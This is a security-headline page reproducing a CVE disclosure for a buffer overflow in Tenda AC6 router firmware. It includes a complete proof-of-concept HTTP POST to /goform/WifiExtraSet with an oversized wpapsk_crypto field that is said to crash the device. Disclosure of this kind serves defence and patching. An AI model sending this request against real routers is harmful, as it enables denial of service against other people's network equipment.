Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-45659: CVE-vulns/fromSetWirelessRepeat.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.

CVE
#vulnerability#web#mac#windows#apple#buffer_overflow#chrome#webkit#wifi

Permalink

Cannot retrieve contributors at this time

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.****Description

Tenda Router AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

Firmware information

  • Manufacturer’s address: https://www.tenda.com.cn/

  • Firmware download address : https://www.tenda.com.cn/download/detail-2681.html

Affected version

Vulnerability details

This vulnerability lies in the /goform/WifiExtraSet page,The details are shown below:

POC

This POC can result in a Dos.

POST /goform/WifiExtraSet HTTP/1.1
Host: 192.168.204.133
Content-Length: 247
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

wifi_chkHz=1&wl_mode=wisp&wl_enbale=1&country_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk_key=11111111&security=wpapsk&wpapsk_type=wpa&wpapsk_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907